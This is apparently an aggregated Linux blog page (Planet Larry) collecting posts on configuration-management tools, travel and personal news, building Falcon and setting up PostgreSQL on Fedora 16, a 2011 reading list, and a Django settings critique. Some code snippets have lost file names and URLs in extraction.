It centers around a domain specific convention which isn’t so bad..  but in no time flat you’ll start seeing full blown Ruby programs intermingled.  Ugh.  But it’s not so bad if you stick to the basics.

If you look around you can find reasonably complete module sets, i.e.  It’s not all gravy as these are heavily interdependent and kludgy.  If you want a clean, simple solution you’re back to rolling your own with some healthy copy and paste.

Since it’s a Ruby project, aside from the annoying fanboys, you’re also going to run into scalability problems past a few hundred nodes.  There are mitigation strategies, but it’s a joke compared to something like Cfengine.

Due to hype, you’ll find decent versions in the Debian and Ubuntu backports repos.  RHEL 5 and 6 are covered by a Puppet Labs repo.  2.6 and 2.7 are therefore readily available and as long as your master is running the later version you shouldn’t have interop problems.

All things considered, Puppet is probably the best choice at the moment.  It sucks, but it’s got a lot of momentum behind it.  There are mountains of docs, books, and tutorials to get you going and nothing is too foreign or hard to grasp.

Cfengine 3

I really want to like Cfengine.  It’s incredibly light weight and hardcore ROFLscale.  It’s got serious theory behind it and older versions have been used in massive deployments.  But it’s not just a blank slate.  It’s even lower level and incomplete compared to the others.

You really need to add a promise library to get features that should be included by default.  These are all stagnate though, and still leave much to be desired.

There’s a company behind it doing something or another, but the open source version is raw.  If you have more than one Linux distribution, I’ll pretty much guarantee the packages are incompatible.

The repo choices aren’t great either.  Uncle Bob’s PPA on Ubuntu, out of luck on Debian.  RPMs in the EL repos look out of date.  You can of course get source and binaries from the Cfengine company, but it’s not my preferred way to install things and makes bootstrapping harder than it needs to be.

I haven’t tried the latest release, but quickly gave this one up when I found severe incompatibilities between point releases.  Madness.  You’d think people inventing something like promise theory could handle something as simple as version stability.

Ping me when a corporation backs Cfengine with a good promise library, some standard tasks, and repos for the common operating systems.


Bcfg2 made the most sense to me out of the box.  XML is yucky and out of fashion these days, but Bcfg2 manages to use it acceptably.  Consequently, most things are declarative, easily read, and overall easy to mimic.  Beyond that, you can tap into some Python template and generator stuff.  But yes, these guys finally didn’t put n-th order above the common cases!  Installing packages and ensuring services are on is a snap.

They’ve got their own repos for many distros so installation isn’t bad.

The client and server are Python so you’ll have similar scaling problems to Puppet in large environments.

My biggest grievance with Bcfg2 is that the server needs intimate knowledge of each operating system version’s package repos.  You’ll fumble around writing a good bit of XML definitions for this in a heterogeneous environment.

The main thing Bcfg2 is lacking right now is community momentum.  Including repo definitions by default and some  more doc work.. I think this would be a great system for small to medium deployments.


The lot of this stuff is really terrible.  End to end system management under *nix is a major pain point.  On top of this, you’ll need a fairly free form monitoring framework (these also all suck) and directory service.  Mix and match an impossible array of projects and eventually you’ll find your own recipe that sort of works.  Except everyone does it differently so you’ll constantly be learning and redoing the same things over and over anyway.

It’s not fun.  What we need is end to end integrated thinking.  This area is still ripe for picking.  Oh RedHat, where art thou?

No related posts.

Posts for Sunday, January 8, 2012


Thailand, Berlin Velocity EU, NYC, Ghent and more metal

I've been meaning to write about a lot of stuff in separate posts, but they kept getting delayed, so I'll just briefly share everything in one post.


In July I did a 3-week group journey through Thailand arranged by Explorado, but organized by ("outsourced to") the 2 guides of roots of Asia, who did an amazing job. The whole concept was exploring "the real Thailand" by means of Eco-tourism. We've been in Bangkok (twice), Chiang Mai city, a mountain village in the province of Chiang Mai, through the jungle, at a fisherman village in Phuket and at the tropical island of Koh Pha ngan. The latter was at the end of the trip and was timed perfectly to get some deserved rest in a more touristy (although not too busy) area, but the majority of the trip was spent far away from the typical touristy areas so we could be submerged in honest, authentic Thai culture and visit authentic locations, often we were at locations where seeing a group of white folks is not common. We've been at unique authentic temples, stayed with various locals and hill tribes, shared meals with them, took the same transport they did (at one point an entire village collected their bikes so we could borrow them to do a bike trip through rice fields and some of the most beautiful lakes I've ever seen). We've had plenty of beautiful moments during those 3 weeks. Like visiting the home of one of the local Thai who built his entire house out of clay, by himself and some friends, or visiting the ancient temple where our guide got married, in a forest in the hills, it was the most beautiful temple of the entire trip, but no other tourists go there because it's not really known (and should probably be kept that way). Or going to a bar in Chiang Mai city (one evening on my own, the next I brought a fellow traveler) to have some good times with some locals. The Eco-conscious part of the travel means:
  • green travel (minimize impact on the environment, "leave no trace"). Other than taking the plane over there and back we did a pretty good job, we've used public buses, night trains, biodegradable soap, etc
  • local foods (no import, minimal packaging, wrap in banana leaves, etc)
  • supporting Eco-conscious projects (like elephant nature park, which is an entire volunteer-based reserve to give mistreated elephants (which has been a big problem in Thailand) a better life, where we washed and fed elephants)
This has been a great experience, and although I found the culture in the South disgustingly based on profiting from tourists, and the cities are too polluted and dirty, I've seen cultures so respectful of nature and each other, living by values I've been trying to apply at home - but being frowned upon in our western society because we're so brainwashed by consumerism, which was beautiful and heartwarming.

Photo album


Berlin Velocity EU conference Berlin Reichstag building I've been in Berlin for the first Velocity conference in the EU, which was quite good. The best part was probably the "Velocity Birds of feather" (whatever that means) unconference the day before at betahaus, which was great for meeting some folks such as the guys (which BTW, is the site we host our music on), although lots more interesting folks attended the conference itself (and it was packed). Berlin itself was nice too. Lots of history (Berlin wall, world war(s)), lots of impressive architecture (old and new), very cheap (albeit mediocre in quality) food, lots of Italian food, a bit cold though.

New York city

Brooklyn bridge Manhattan harbor I'm still recovering from the awesome time I just had in NYC. I've been way more busy over there than I anticipated. I should have stayed 2 or 3 weeks instead of 1 :). I've met various locals (one of whom who'd love to become a city guide as 2nd job because she just loves showing people around, so that just turned out great!). I didn't go for the typical touristy things (I skipped things like the WTC memorial, empire state building, statue of liberty, to the extent you can skip them, as they are very visible from pretty much all over the place). Instead, I wanted to get a feel of the real city and the people inhabiting it. I've seen parts of Queens, central and North-West Brooklyn, lots of areas (but not enough) in Manhattan and even Staten Island, been to a rock concert, comedy, improv and cabaret shows, the movies, more bars than I can count and mostly ate out with company (just as real new yorkers do, of course, though for breakfast that feels a bit weird). I even went shopping (not mall-shopping, but groceries in the supermarket, the Williamsburg Foodtown - that's what it's called - clerk advised me to enjoy every last second in the US, phrased in a way as if any other place in the world sucks in comparison, which is ridiculous, but turns out I followed his advice anyway) because I stayed at an apartment in Williamsburg, I also had 2 roommates, with whom I ironically couldn't spend as much time as I wanted to as I was so busy meeting up with all those other people, I also visited the Etsy and Vimeo offices (both are awesome) and met up with Dave Reisner (who is one of our latest Arch Linux devs, and who lives in NJ, but don't tell anyone) and who forgot to show me around in the Google office ;-) And I realize some of the past sentences are a bit long and busy but that's one of the things I learned at New York I guess. For one week, I almost lived like a real New Yorker, and it was interesting (but exhausting).

Move to Ghent

Ghent, bridge of Sint-Michiels Ghent, coupure Enough about the trips. Back to daily life. I moved to the city of Ghent. Riding by bike to work every day along the scenic Coupure is fun. I am quite proud to say nearly all of my stuff in this apartment is second hand and I've been lucky to receive some free stuff as well (thanks Bram!). Not (only) because I'm cheap money conscious but I like to give things a second life instead of buying something new, lowering the impact on the environment. Even if it doesn't look too well, as long as it's functional. And this is exactly one of those values I mentioned above which is often not understood in our Western society but I was pleased to find out this philosophy is the standard in large parts of Thai culture.

Death metal

Promo shoot Live @ Frontline, Ghent We've done 3 gigs (which had great reception, luckily) and we've got planned a few already for 2012, one of which will be at the From Rock Till Core festival in Merelbeke. We also did a semi-professional photo-shoot, and I made a website (you can tell I'm not a designer).

That wraps up 2011 for me. Good times.. Happy new year everybody!

Posts for Monday, January 2, 2012

Compiling Falcon PL on Fedora 16

I don’t contribute code on a regular basis. I admit it, I’m a crappy developer. Also, I prefer not to lie, my C++ skills are lacking at best most days. Given that, though, here’s how you can setup, build, and install the Falcon programming language from Git on Fedora 16.

First setup a clone of the falcon git repository
mkdir falcon
git clone

Install the neccessary pre-reqs
yum -y install gcc-c++ pcre-devel sqlite-devel curl-devel openssl-devel mysql-devel postgresql-devel doxygen

Granted the following packages from above are technically not “have-to-haves” but I take them all because I’m special:

  • sqlite-devel
  • curl-devel
  • openssl-devel
  • mysql-devel
  • postgresql-devel
  • doxygen

Make it so
mkdir build
cd build
cmake ..
make install

Finally, so Falcon will actually run, you’ll need to add /usr/local/lib to your /etc/ file.

Thanks to the Falcon PL mailing list for help with that last part.

Posts for Sunday, January 1, 2012

reading in review 2011

It’s been another prolific year in page turning. I’ve decided to scrap the idea of doing a long list like last year, it’s too dull. Instead I’m doing a brief review.

The best of the best (of the best)

The credit goes to the indomitable Steve Yegge for making a strong recommendation for it. And boy did it check out.

Gödel, Escher, Bach ~ Douglas Hofstadter

GED is simply the most important book I’ve ever read. Hofstadter sets out to do one thing and do it well, namely to give a description of how consciousness works, or could work. He does this by way of countless enticing analogies across different fields, chiefly mathematics, art, music, computer science and genetics. It’s a challenging book and a very rewarding one. In order to get through it profitably I had to put myself on a relatively intense schedule to make sure I had enough context in mind at all times.

The better books

Looking back over the year there are quite a few that deserve a mention here.


Apocalittici e integrati ~ Umberto Eco


SuperFreakonomics ~ Steven Levitt


Due di due ~ Andrea Di Carlo
Il fu Mattia Pascal ~ Luigi Pirandello
Il nome della rosa ~ Umberto Eco


A History of Western Philosophy ~ Bertrand Russell
Man is the Measure ~ Reuben Abel
Religion and Science ~ Bertrand Russell
The Moral Landscape ~ Sam Harris
Zen and the Art of Motorcycle Maintenance ~ Robert Pirsig

Purely for fun

Kruistocht in spijkerbroek ~ Thea Beckman
The Broker ~ John Grisham
The Hitchhiker’s Guide to the Galaxy ~ Douglas Adams


Cose di Cosa Nostra ~ Giovanni Falcone
La baia dei pirati ~ Luca Neri
Lettera a una professoressa ~ Lorenzo Milani
Se questo è un uomo ~ Primo Levi
Todo modo ~ Leonardo Sciascia

Less compelling, but worth a look


Il conformista ~ Alberto Moravia
L’avventura di un povero cristiano ~ Ignazio Silone
Le cosmicomiche ~ Italo Calvino


Le Rire ~ Henri Bergson
The Problems of Philosophy ~ Bertrand Russell

Purely for fun

Le Petit Prince ~ Antoine de Saint-Exupéry


A Short History Of Nearly Everything ~ Bill Bryson


Morte dell’inquisitore ~ Leonardo Sciascia
Vaticano S.p.A. ~ Gianluigi Nuzzi

Classics that work

A special mention for Il principe which is quite fascinating, both for the time it was written, the frankness of the analysis and the efficacy of its insights.

A Portrait of the Artist as a Young Man ~ James Joyce
I promessi sposi ~ Alessandro Manzoni
Il principe ~ Niccolò Machiavelli
Le comte de Monte Cristo ~ Alexandre Dumas
Les Trois Mousquetaires ~ Alexandre Dumas
The Picture of Dorian Gray ~ Oscar Wilde

Classics that don’t check out

For every batch of classics there are those that just aren’t particularly worth reading. Either because they are too boring (Kafka), the characters are so annoying that you never begin to care what happens to them (Karamazov), because the language is abstruse to the point of being near impenetrable (Nietzsche), because the reasoning is so dated it bears little relevance to present times (Descartes), because the events are so remote they are of little interest today (Discorsi), or because the author is simply a dullard narcissist (Thoreau).

Beyond Good and Evil ~ Friedrich Nietzsche
Discorsi sulla prima deca di Tito Livio ~ Niccolò Machiavelli
Il piacere ~ Gabriele d’Annunzio
Méditations métaphysiques ~ René Descartes
The Brothers Karamazov ~ Fyodor Dostoyevsky
The Castle ~ Franz Kafka
Thus Spoke Zarathustra ~ Friedrich Nietzsche
Walden ~ Henry David Thoreau


Žižek is fascinating and great fun to read, although he tends to recycle his jokes and analogies quite a bit. This year I set out to read all his of books that I could find in Dutch.

Actuele filosofie ~ Alain Badiou
Conversations with Žižek ~ Slavoj Žižek
Intolerantie ~ Slavoj Žižek
Violence ~ Slavoj Žižek
Welcome to the Desert of the Real ~ Slavoj Žižek


It’s been a good year for Italian. And for Dutch. But I so rarely find anything worth reading in the Scandinavian languages, which is a bit of a shame. I’m about ready now to wind down with Italian next year, and have more time for Dutch and French.

As last year I managed to introduce some new languages.

1 *afrikaans
33 english
1 *español
16 *français
44 italiano
28 nederlands
3 polski
2 svenska
128 Total

* debut in 2011

Django and the localsettings anti-pattern

In the Django web framework, the configuration happens in a file called Often you want different settings for different versions of a site, e.g. a development branch versus the live branch. Thus far, I am always a lone developer or part of a small team, so usually a couple of branches is enough. However, maybe in a large organization, you might have several staging sites for various testers.

A common convention is to have a file called something like or This file is imported by the main file. Therefore the production and development sites have the same file (containing all the boilerplate) but different files containing the branch specific settings.

In this presentation, Jacob Kaplan-Moss calls this the "localsettings anti-pattern" (Slide 47). What he seems to be recommending instead is having a different a different WSGI file for each branch (Web Server Gateway Interface is the protocol that Python applications use to talk to web servers), each pointing to a separate settings file.

This moves the problem up a level, but does it really change anything? One of the reasons that people have the file is to have the database password not part of a public version control repository. I am not sure how much Jacob's solution helps. Am I missing something? Now I have two pairs of files instead of one.

I know at least Bazaar has a shared repository feature, where you could conceivably have a secret branch and public branch with a single file tree, but setting that up is a lot of work just to version control a password and a few other secret settings. is the anti-pattern

This is just a symptom. The underlying problem is that itself is the anti-pattern. You might always need some kind of configuration file for database settings and other secrets, but the file mixes in a shopping list of other junk.

Most of them could be gotten rid of. Django should just set sensible defaults, and where the (minority) user wants to configure them, make the option a simple argument to whatever class, method or function is being used.

Contrib and third-party applications add even more settings which could be arguments or options in the database.

The whole advantage of Python is that it is an interpreted, interactive and dynamic language where you can change things at runtime. Having a load of hard-coded static global variables is not Pythonic at all.

When you use the admin site, you subclass admin.ModelAdmin for every model that you want to use:

from django.contrib import admin
from myproject.myapp.models import Author

class AuthorAdmin(admin.ModelAdmin):
pass, AuthorAdmin)

Each ModelAdmin subclass configures what applications are used and how. You have imported your model (Author in the example above), and registered it using That should be all the info the admin site needs to work.

This is object oriented and Pythonic. This is how things should work everywhere in Django. There is no need for a hard-coded global static INSTALLED_APPS setting.

So what now?

So I don't really know what Jacob is telling us to do. I am sure someone will write in and tell me that my mistake is that I should have used Rails or some obscure web framework named and documented in Burgenland Croatian hidden somewhere on github!

Happy New Year!

PostgreSQL Setup – Fedora 16

First install everything we’ll need.

yum install postgresql postgresql-server
initdb -D /var/lib/pgsql/data/
pg_ctl -D /var/lib/pgsql/data -l logfile start

And that should do it. It’s really that easy. You can also run this

ps -eZ | grep postgres

and that will show all the running postgres processes running. After that you can do awesome things like create databases

createdb new_database

Good luck!

Posts for Saturday, December 31, 2011

Happy New Year!

Happy new year! Enjoy the penguins!

Planet Larry is not officially affiliated with Gentoo Linux. Original artwork and logos copyright Gentoo Foundation. Yadda, yadda, yadda.